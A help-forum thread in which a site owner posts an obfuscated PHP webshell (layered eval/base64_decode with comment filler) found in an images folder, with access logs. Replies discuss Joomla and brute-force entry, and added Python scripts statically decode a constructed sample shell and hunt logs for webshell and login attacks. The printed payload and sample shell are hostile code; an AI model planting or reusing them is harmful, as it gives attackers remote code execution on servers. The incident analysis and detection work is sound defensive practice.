Solved

What kind of a hack is this?

Posted on 2014-12-23
242 Views
Last Modified: 2014-12-23
I had a bunch of PHP files messed up yesterday by some script.  The common thing is they had 666 permissions rather than 644.  But ... still ... a script had access to mess the files up.

This morning I find these lines in one of the logs:
114.246.132.143 - - [23/Dec/2014:00:05:06 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1"

223.99.189.102 - - [23/Dec/2014:04:03:17 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"


And the PHP file in question is this:

<?php /*m\i2s-*/eval/*Ad?K8s*/(/*jHF&*/base64_decode/*(~G+z*/(/*=32*/'Lyp6OTNaYn0qL2V2YWwvKjNZezMqLygvKjcuSz1pWyovYmFzZTY0X2RlY29kZS8qRHFHeyovKC8qLno2K'/*ueL<*/./*6 qH*/'WVFWiovJ0x5cE1VM3RUSmlvdmFXWXZLa0EyZlc5UWZpb3ZLQzhxWicvKlE/c3IwaiovLi8qOnxASCovJ1'/*HnRA*/./*Cdlj=.*/'ZGK0tpOXBjM05sZEM4cU0yWWhZaTVZWkNvdktDOHFYMScvKl9pfTVSR3oqLy4vKmpxdH02Ki8nMUtLaTh'/*!.R5*/./*ehZS%*/'rWDFKRlVWVkZVMVF2S2w4bUxEOUpVeW92V3k4Jy8qIW9KdUQqLy4vKm97NEcqLydxSVRFd1VWOHdXU292'/*PKlM}%*/./*n{*/'SjNrbkx5b3RleWhxY3k1QUtpOHUnLypLVy58Wi0qLy4vKkk5WnFdW0gqLydMeW9zS0d3cEtpOG5aeWN2S'/*<o!}3*/./*}en~p*/'240OFZtc3FMeTR2S24xdFAnLyorWDB7ciovLi8qVVJMdSovJ2xoTE15b3ZKM2tuTHlwN1MxeDdkeW92TG'/*E;4=]*/./*(9S*/'k4cUlHMXBVbCcvKmR4a25EayovLi8qN3VCKi8nb3FMeWQ0Snk4cVRqazVLaTh1THlwcWJERitVellxTHl'/*{HYT2t*/./*;0UAF9*/'kJy8qVF9ePDMqLy4vKkF3RGIqLydrSnk4cVRIQmhOU292WFM4cU9YazFTRlVxTHk4cWFqNWwnLyowMjd0'/*_R|W*/./*f-KQq_*/'Ki8uLypJY099IFRyKi8nVlY0cUx5a3ZLbTQwTFc0cUx5OHFOVlZOYm1SYUtpOHBMJy8qR25IeCovLi8qO'/*hc]4b*/./*K^oB5y*/'nlvbEAqLyd5cFZlazl2YlhFcUwyVjJZV3d2S2poK0prMGhTeW92S0MnLyogaChbc3pUNSovLi8qeWllcW'/*X(4J:@*/./*5,>*/'tyUCovJzhxUURaZVF5b3ZjM1J5YVhCemJHRnphR1Z6THlweElGQScvKjNmVWhUKi8uLypeMngzKi8nc0x'/*s:@*/./*gf=*/'pb3ZLQzhxT0U1ek1WZ3lZQ292SkY5U1JWRlZSVk5VJy8qLEJxPTVwaSovLi8qTilTMCUqLydMeW9oVVZo'/*b>x]*/./*>|TG*/'b1Fsd3FMMXN2S2lWN1p6Z3pLaThuZVNjdksnLypgRzhOZlcqLy4vKiVZNSovJ2tjaFhqQXFMeTR2S2xGd'/*t|qE5*/./*(}XycS*/'FlrOHNLaThuWnljdktrZzZiUycvKkt4WkElSEgqLy4vKjB+VS0qLydvdkxpOHFRSEZZYkRVcUx5ZDVlR1'/*[:I*/./*:bP*/'FuTHlvaGZTaFNLaTknLyp9KF9yUiovLi8qTW5VZGsuXSovJ2RMeXBYT25wRFlGa3FMeThxTWljc1czNXZ'/*wEy93*/./*?0{^*/'LaThwTHlvZycvKlVSXWJ0Ki8uLypJaS4qLydYVUk0VWlvdkx5bzVLWGw0Y0NvdktTOHFVbXRpVnp0OUsn'/*u}C*/./*5_D0*/'LypJUWZ4Ki8uLyp7LHsxeTgqLydpOHZLa1ZmYlc4NVFrQlVLaTg3THlwWWFubGVjU2h3YVNvdicvKkEnJ'/*!ja*/./*~J_n*/'05SXHhqKi8pLyopK215PSovLypzMC1nWztJKi8pLypZXHQ1ZlEqLy8qcEVRZ0xbXyovOy8qfEo0LT8qLw=='/*uRn34*/)/*kzY!*//*JJD*/)/*:@uW*//*BN9T*/;/*ZTX%*/ ?>


What kind of attack is this? I want to correct more completely than just locking down the permissions so that the script doesn't work.

Of course, I'll delete the PHP file, but ... there's a vulnerability involved that allowed the file to be placed there.  I want to close that down.

Thanks.
Question by:Daniel Wilson
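The file posted above is a layered PHP dropper: once the /* ... */ noise between tokens is stripped, what is left is eval(base64_decode('...'.'...')), and the first decoded layer begins with eval(base64_decode( again in the same style. The script below is an added example, not the poster's file or any project's code: it unwraps such layers statically (nothing is executed) and lists the dangerous constructs that remain at the bottom. It runs on a constructed two-layer sample built in the same style rather than on the blob above; the inner request parameter name 'x' and the indicator list are assumptions. Point peel() at the real file contents to decode them.

```python
import base64
import re

# Constructed sample (NOT the blob from the post): a two-layer eval(base64_decode(...))
# dropper in the same style, with /* ... */ noise between tokens and the payload split
# into concatenated string literals. The innermost layer runs attacker-supplied PHP
# from a request parameter; 'x' is an assumed parameter name.
INNER_PHP = "/*k1*/eval/*k2*/(/*k3*/stripslashes/*k4*/($_REQUEST['x']))/*k5*/;"


def _split_literal(b64: str, chunk: int = 24) -> str:
    """Render base64 as 'aaa'/*n*/./*m*/'bbb' pieces, as the posted file does."""
    pieces = [b64[i:i + chunk] for i in range(0, len(b64), chunk)]
    return "/*n*/./*m*/".join("'%s'" % p for p in pieces)


def wrap_layer(php: str) -> str:
    """Wrap PHP in one comment-noised eval(base64_decode(...)) layer."""
    b64 = base64.b64encode(php.encode()).decode()
    return ("/*h7*/eval/*Ad?*/(/*jHF*/base64_decode/*(~G*/(/*=3*/%s/*uR*/)"
            "/*kz*/)/*:@*/;" % _split_literal(b64))


SAMPLE = "<?php " + wrap_layer(wrap_layer(INNER_PHP)) + " ?>"

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
# After comment stripping a layer looks like: eval(base64_decode('...'.'...'))
LAYER_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*((?:'[A-Za-z0-9+/=]*'\s*\.?\s*)+)\)\s*\)", re.S)
LITERAL_RE = re.compile(r"'([A-Za-z0-9+/=]*)'")
# Assumed indicator list: request superglobals and code/command execution sinks.
INDICATOR_RE = re.compile(
    r"\$_(?:REQUEST|POST|GET|COOKIE)|"
    r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open|"
    r"create_function|stripslashes|base64_decode)\b")


def strip_comments(php: str) -> str:
    """Remove the /* ... */ filler the dropper uses to defeat naive grep/signatures."""
    return COMMENT_RE.sub("", php)


def peel(php: str, max_layers: int = 16):
    """Strip comment noise and decode eval(base64_decode(...)) layers until none remain.

    Returns (layers, final_code): every layer seen, outermost first, and the code left
    when no further layer matches. Purely static: the PHP is never executed.
    """
    layers = []
    code = strip_comments(php)
    for _ in range(max_layers):
        layers.append(code)
        m = LAYER_RE.search(code)
        if m is None:
            break
        b64 = "".join(LITERAL_RE.findall(m.group(1)))  # rejoin the split literal
        try:
            decoded = base64.b64decode(b64, validate=True)
        except ValueError:  # binascii.Error is a ValueError; bad payload, stop here
            break
        code = strip_comments(decoded.decode("utf-8", "replace"))
    return layers, code


def indicators(code: str):
    """Ordered, de-duplicated list of webshell indicators found in decoded code."""
    seen = []
    for tok in INDICATOR_RE.findall(code):
        if tok not in seen:
            seen.append(tok)
    return seen


if __name__ == "__main__":
    layers, final = peel(SAMPLE)
    print("layers unwrapped:", len(layers) - 1)
    print("final code:", final)
    print("indicators:", indicators(final))
```

On the constructed sample this unwraps two layers and ends at eval(stripslashes($_REQUEST['x'])); which is why the two POSTs in the access log returned only 33 bytes: the shell does whatever the request body tells it to and answers tersely. Because the filler comments are random, signature matching on the raw file is unreliable; match on the stripped form, or on the decoded result, instead.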
5 Comments
 
Expert Comment by Gary (LVL 58), ID: 40514876
What are you running?
Wordpress or similar?
The contact form is the usual way to hack if it was done through the website, or one of the plugins/vulnerabilities of WP et al.
Otherwise you need to check the server logs for SSH/FTP brute force attacks.

Author Comment by Daniel Wilson (LVL 32), ID: 40514886
There is one Joomla site ... though most are hand-coded PHP.

Thanks for the tip ... I'll look harder at some of those other logs.

Accepted Solution by Gary (LVL 58, earned 500 total points), ID: 40514888
Joomla would be the one I would be looking at with stern eyes.

Author Comment by Daniel Wilson (LVL 32), ID: 40514900
Looks like it's been quite a target.  I have hundreds of lines like this from one IP in the same day.

91.200.12.21 - - [03/Nov/2014:23:20:35 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:35 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:36 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:36 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"

 
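The two patterns visible in this thread's log excerpts, POSTs to a .php file under /images/ (the shell being driven) and a burst of POSTs to /administrator/index.php from a single IP (a Joomla login brute force), are cheap to hunt for across the rest of the access logs. The script below is an added example, not the poster's or the thread's own code. It runs over the lines quoted in this thread plus a few constructed ones, marked in the comments; the static-only directory list, the login path list, the threshold and the time window are assumptions to tune for the site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Sample input: the lines quoted in this thread, plus constructed ones in the same
# combined-log format (the 23:20:37 and 23:20:38 POSTs and the final benign GET).
LOG_LINES = """\
114.246.132.143 - - [23/Dec/2014:00:05:06 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1"
223.99.189.102 - - [23/Dec/2014:04:03:17 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
91.200.12.21 - - [03/Nov/2014:23:20:35 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:35 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:36 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:36 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:37 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:38 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
198.51.100.7 - - [03/Nov/2014:23:21:00 -0500] "GET /index.php HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
""".splitlines()

# Apache/nginx "combined" format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')

# Assumed: directories that should only ever serve static files. A POST to a .php
# file under one of them is a webshell being driven, not normal site traffic.
STATIC_DIRS = ("/images/", "/media/", "/uploads/", "/tmp/", "/cache/")
# Assumed: login endpoints worth rate-watching (Joomla admin, WordPress).
LOGIN_PATHS = ("/administrator/index.php", "/wp-login.php")


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["path"] = d["path"].split("?", 1)[0]  # drop the query string
    return d


def webshell_hits(entries):
    """(ip, path) for every POST to a .php file under a static-only directory."""
    return [(e["ip"], e["path"]) for e in entries
            if e["method"] == "POST" and e["path"].endswith(".php")
            and e["path"].startswith(STATIC_DIRS)]


def _max_in_window(times, window):
    """Largest number of timestamps falling inside any interval of length `window`."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while times[start] < t - window:
            start += 1
        best = max(best, end - start + 1)
    return best


def login_bruteforce(entries, threshold=3, window=timedelta(minutes=5)):
    """ip -> peak count of login POSTs inside `window`, for ips at or over threshold."""
    per_ip = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and e["path"] in LOGIN_PATHS:
            per_ip[e["ip"]].append(e["ts"])
    peaks = {ip: _max_in_window(ts, window) for ip, ts in per_ip.items()}
    return {ip: n for ip, n in peaks.items() if n >= threshold}


def analyse(lines):
    entries = [e for e in (parse_line(l) for l in lines) if e]
    return {"webshell": webshell_hits(entries), "bruteforce": login_bruteforce(entries)}


if __name__ == "__main__":
    report = analyse(LOG_LINES)
    for ip, path in report["webshell"]:
        print("webshell driven from %s via %s" % (ip, path))
    for ip, n in report["bruteforce"].items():
        print("login brute force: %s, %d POSTs in 5 min" % (ip, n))
```

The webshell check is the one to run first: it finds every PHP file an attacker is actually using, which tells you which paths to pull from disk and decode. The brute-force check points at the entry vector; in this thread the admin login burst is from a single IP on 03/Nov, weeks before the 23/Dec shell traffic, so the window between the two is where the rest of the logs (including FTP/SSH, as Gary notes) need to be read.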

Expert Comment by gr8gonzo (LVL 34), ID: 40514976
If you have root access (e.g. dedicated server, VPS, etc.), then try using OSSEC to help secure your site against random attacks like this.

Here's a good tutorial on how to set it up:
http://hackertarget.com/defending-wordpress-ossec/

The tutorial is geared towards Wordpress but OSSEC is a general-purpose security application:
http://www.ossec.net/